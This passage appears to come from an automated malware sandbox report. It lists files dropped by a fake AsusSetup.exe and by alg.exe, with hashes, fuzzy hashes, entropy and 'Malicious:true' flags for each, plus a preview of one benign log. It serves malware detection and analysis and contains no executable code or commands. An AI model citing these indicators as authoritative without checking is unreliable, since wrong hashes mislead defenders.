                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EE587CCAE2DA08C1B7A64900823D42D580CEA6A73EC9A879B906290F38CF68E4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C27FBB0E8B401D28B82963D95D4603584F69236A7FC598B59F2BF21727E41E1955DE8EA76712D14C6CFAD27B7E19A706E7EC0349162985DE134F881F8AE712CB
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.046444096806811
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:QhDdVrQ95RW0YEHyWQXE/09Val0GCLNiXicJFFRGNzj3:QhHYW+HyWKJ7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:CBF202B063F059F65F8A6C7DB7B54192
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8C9C55122E8C2AC8E04FDE3B3F203157471F9AC3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D5807057116F9CB60929368396068B0B1962CF5B672FBCE4597A9A8426D84A92
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9FA20AED95CAB6C5AFA4ED723FB4A42BB709F807A1200BCC1E04C20BA60CE4B722EBA1F90D951B6F439EF3F05C13D5C16A5BC0455133B11EF4A2D40C63A8ACBD
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.153860294869928
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:M70E0ZCQZMiU6Rrt9RoctGfmdd3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:I0EzQSyRPRoc1LLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:020FA274E1B7EF115DC47EADD7EA47B8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:68F478C4AAC6A2FDBB6938C89C3E5C536A481C63
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3834E3BB368ADFEDBE02AF29CC2158FD4AA283ED84F404323CD904CF72D64287
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7CD948C1E4D10F21AD016EE0FC69C766E45F4B3F421541D4086BCABC8934099C8C0C980FE2E58FDB0E12CB659E169F574F8B1FDCE50E095810A2E74BD566DF56
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.140942964781337
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ZiD2VmA1YXwHwlklb8boUuWPg2gc/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:YD2VmAyiwIb8boQHLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:40561BC13E8B65ADA5C9051925C7251E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:41235ECA87AD1639FF242B7DFF80C3CA79674155
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4AFF3BA7C2D34B9D6DF78C2FD23DBEF47BA15D329859F47A603FB263A3F0A979
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8996FA1FBAC4243D7152971ACCFAB8FAE3A54162BC974027296FC7A79AAEDF03CFA09BDE1B6AAD6C7483A9763A9046C0A1E0AA3EA13B1228D953147FE436CF14
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.9482306118624315
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:GfD3zO9ZhBGloizM3HRNr00vLNiXicJFFRGNzj3:cDaalxzM00v7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:271E41515C37485007D927D2E11A9636
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C8E04CD3FD20DBC1F4544383EB8C4A97B2787078
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C2531A3865B3D37E8BE27A5416BEE38D11A24FD8490881045B462EF9D9ECC1D2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EA9B9ABB7CEEBAB8D116D0E87148363177E6D72E14E419FC70A0C5307B599D2E9089E580AA2F6029CDF15417BC065F067C01693A5EABBDA3C43F937F25E4BB49
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.822741417552192
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:PTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhoLNiXicJy:2I72LvkrDpbxJRoIM37wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C9D45C17974524C0F2911C906638B7CB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EF7C5D4B87E5B509E50C4E406E0868D8C29D4651
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6524477319E3531F44F4829C2A0508975E2B0E80ECC1DFE5213C9DAE798C3B30
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:556081B0A96848DB63263B255F3DED86B254768564E08CD6B7A1267F8C8FE3716846EDC122BEE421E326ED4FFB6EB73868BD9DA93CFBA608397F017E97132E01
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.0931446857041704
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:IW9Jml9mmijviMnF+ZxmQWcbLw8Vn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:IWnm5iOMkjmQWkVnLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:545BC095F0D8CF6481B16EB1124B2C8E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:480A8F4E1F7106DB30851FF241609CFEDA0D932C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7682D31F53484403F3EEB4558DEBFDF9B7A9037824005D6494ECAA46EFBFDE6D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:79E4222B08772922D4EE579D3A96AF4603CA6A27EA0F65832B2E90B74AF0CD602B0378B94A4EC6743920F4F7B9C2F0B0E6540E9418B1AD1BA4ECABE6FBE2AA39
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.161679828298311
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:zwNHwoYhua6MtjRO4qbBJTY6mY1uIgJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zwNPdQO7BJTfmESLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:ED70335724770E3131D3270D74644631
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E57443A741C94760B5AD607EF6B6B12FBE26B0A0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:04CCA7F39450E607CBC923C0946A6E1C71DCE65AC3A81EE17B31D513DD2293E3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8F6FF01AECABBEB7D5E8E5D5AE0120DA024D92FD0D87C47BEAFDED57FF9B6498EAC1CB05AE25D802DE29F12C4292DDB75DE4994F213859A91719A50B92851B18
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.140942482666784
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:HiD2VmA1YXwHwlklb8boUuWPg2gc/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CD2VmAyiwIb8boQHLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2B91A537773F52B84B7A99D05762C50A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F89F09DCEDE197ABDAA09D33A92BCA4BE1406F16
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5EDC4AFBFEEE7DE384182A2223708448FBFEE026F2F87EC573AAFC0D0E4486E9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EE3CA6D9509A77611F156D2F12E460234FD58622BC121C517A756630E20BDE1667F49F60BFACA8125B86F0111F074B6FCB25995A008AF12768E00535A2D2D085
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.161686555965827
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:swNHwoYhua6MtjRO4qbBJTY6mY1uIgJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:swNPdQO7BJTfmESLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:046AA8B832C84C0AB95EE936D772C7F1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5675A03670B2DF2487E9AF5E0EF8E09714622246
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8B07F32D6018E77F977F6A4C19A9670B2EB04E4E246C095B0E73ACB67E5F8513
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CCAB11EAA788E729CB3FD5841CF85405D303914B4D780D68D08894D078A46A21FB729CB10A77AF951D09B153079C96C1580BE7F9E901500C6BAABE04440D3EB4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1481216
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.699169608530082
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:tglbht6BHe/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:2lNtqHeLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:6A4E873CF82C0FC8271E880382635A80
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3462F7D0AD0C35B7C96AC177963CA0445B8F2C65
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C3FC79CE4F5F57C64670A79D43F0EFDB14DF319F81584C4BC9CE9136DD035590
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:71184E43E31488641F6ACAE738CDF499115100137CC34C2B01C9EED792A5E25F10348CF26407898DC50431E8FAA614B1CEC28513261B7D8E39ED8CE60B0E25D3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1376768
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.662255903694801
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:9IxkTBVS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ixk1VSLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:45A40CFE07E683A0F5B1ED4A6CE4D08C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EFABB8AEFEA4293577C2B5EE980C6FB2299B1C78
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:808403A2CFA8ADB48CF55A208E7C8F9EBB6C4F8CE16CAF53A67F0B9521506A87
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:66DD07B2C64629E46E068CFF2D5416E32013830B3E485C07CA6955A115541A66707D67FB8F780EB08E28FD3A6821DEBEF086293912A71BEA3EEFD57BC91DDBAE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1490944
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.7912214418940975
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:kcssmrj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Fb0LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:426865650B4632F9760FB9A68CC5BFF2
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AC39A7BBD0BDD1516F7648FEF853197431EB6022
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A9E92DA2F3F1C769015FE47F43AF9207B3EED2135175662A52BE0110B011C86A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DD3486E8743CB01BB19A9CA3BDC333761E899FBE456926B0DBB1A62193B6D1C8ECE078D7945349737144AE876258BD0D2FF01EC0874BDCD45E15EB41AF4E7766
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1539584
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.901280237252348
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:B0/cT++foSBWU2YxhkgI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:u/cK+foQWU2YnPILNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E2083E4FE565E5914BAC074D8177BC75
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8F307406EC7C64C87D64B70F395A1F1B08DB53D0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:50AE6CCC40F4BE3FB4CC31245C67C1DD7C5DFB3B64EB16372AF54D911866871D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2F2BDB60CD07CF18F58C5C522908EE8AFB90B396DCA89178B91C4D887857A76FA654C38F50AA91454FECCA15225B36DCA1D37F51BF3A1C5081788F00DE065785
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1376768
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.662316428728685
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:pbBRzBgo/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9BRVgoLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9F888135E9243A47C7A54AC8FC1F5434
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3F7BCBA91E68A304D6C6C0638B7EDFB6E94AC137
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:092A5B18069DBF3C34D8AE84CBA86D0B5F8E0DFCF7868CAD968EE42ADE4C17D4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8DA95C4D10F85720224C0C9ACE3A0106A55B7C7A53107CC2A28B53A0E7D2F698E161537C9F35D6657043BBFEA9CDBF68E1FE716D966925AAC98D97E4907933B7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.93883180102799
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:jy53w24gQu3TPZ2psFkiSqwoz6LNiXicJFFRGNzj3:jyFQgZqsFki+oz67wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:348E7A2C61B61CFFFD8BD924BAC4F5CC
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:405BEDF59A81AA650A8DCFD358F433668125D520
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F39E79C3AAC2DCA7E26446BC54B851B96A95EBA1BDCA72A2C20FDB6C50298D55
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CCB8044A3AEC7C77504E8AF58B248C718588971F280A1C3BF79E4D0ED47A4DA9AE362FEBE109514B13D3B7183F5E362E20F0BA2DF2F872246763E67DDBF42A8F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879074990482017
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:mxLdxxHYxrxsxCJxPxkRQ4WtGxw4WmIGxjWxuxJx8DxHxp4WqGxVMxqC4WlbG4WC:AqWRERmnyXliUNqg/lnmD
                                                                                                                                                                                                                                                                                                                                                                                        MD5:827CE1E227825A1C7CD47C62512A1214
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D33F9439F7813C5CC344B002EEEEC35F8BF5FCDB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D4FD2E87A5BBD9060DE2F9127DD2A39C334086579763B33FD3CD4F9A8333E1F8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0D6D1A1B11C4BB8D0F7EFBDFB24652500282B319F3B7050D8B08D4F1A785FCDED7E36C061E2CE476C9C895831E0147FAFC0D05BB2A6F43A446C43702B3346288
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Preview:2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeAuditPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeBackupPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-10-28 11:37:08-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeDebugPrivilege...2024-10-28 11:37:08-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-10-28 11:37:0
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1512448
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.901598065158658
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:MQVTZu0JX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DVTZuSLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:DF7731CD51167F1E9F73863D919CAC1B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3FCD0C1B60C190B1F840BF19811AD74191428FED
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6B8882DDED85C95AB2067BD6E3B3292525324AA050FA1459513D9DBC8AE9C12E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3EF99D1327D598D3E2CEFE73C7AD56FC7D22247CCA06EF6D9FF2BF9DD22043390A2555FF74B7A4801D7E6477F3B3A7C50B0BA4F7618E95BD8FB4EB0A280DDA3F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1839616
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.248889853974881
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:Q+gkEHfh4Cow/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9gkE/S+LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F9E738FC2CF5A481BF10DB82FB02D604
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1521EDA352C08E2F6B09BCDAFC2BFD4A41E93E63
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:365F865318B3B23D647AA7C597C65F4F6CA0901A68BA584A19B69971295D08DE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:59832A26FC747CBB1670E7DBDF715855A11D7B13FE176ABE20F34548673E93528D77109B5E81C36606A7F1DEFA004E7B47A4FE7B5080BBB96DE9BA06C6145DA5
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.091733774926007
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:IBpDRmi78gkPXlyo0Gtjrf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:cNRmi78gkPX4o0GtjDLNiXicJFFRGNzb
                                                                                                                                                                                                                                                                                                                                                                                        MD5:39ED93F77636D50B42683F9C5BD61C27
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:805584D1F82F504B0178F9106C57F1D1B518F6F3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F6BFA47CD9750266EF3491F61E683DE3F37CB35C4384EB998BF9E715468FB74
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D9CBB43ADCCCC9898521B1384E9E694CFA6A1CCF309549D26EE4771A788A10246DA8612848F101D5150DF7C8B2BD6313D386A0E21FA31F116E45C02CB1A06F22
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.22265222311563
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:WLOS2oTPIXVw/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:G/TLLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8BF6C5DB16141C2DA08B39DBBF1A7457
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D0EB3F75DDF04F771CD92CCCDD30455C6F4E63BE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:50FE31901E29C4B99F586E6085DDC0680B049D499414A56F7D77D31A103AA4D1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3A91BF2FBF94C92FFAB2B27BFE737E4953E8FC28DCC49F9B372F650DC0D804FEC18CB7AE25ED933B087C6CC9930F18BE25DFA6A8AB9405B35A018F443B00013F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1300992
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.534761145085648
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:nte/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:444226CD83D412D391E7A5F63AED9186
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:17754A6AA776C44DAC69EF2B1DB9491BC8614BD5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B3342626A1C2F6020F13B3B1A6B1A652422C128CE2F8979584DF1A0FC43227E3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8A95E4E04B681F49BBB8BA296D9B5530FA699FE55C263FC16FE193D01DF41CCF8F569D4890A802AD5EFA9220786F588AA2E379D13B7CD0DBE19A45C74064B138
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
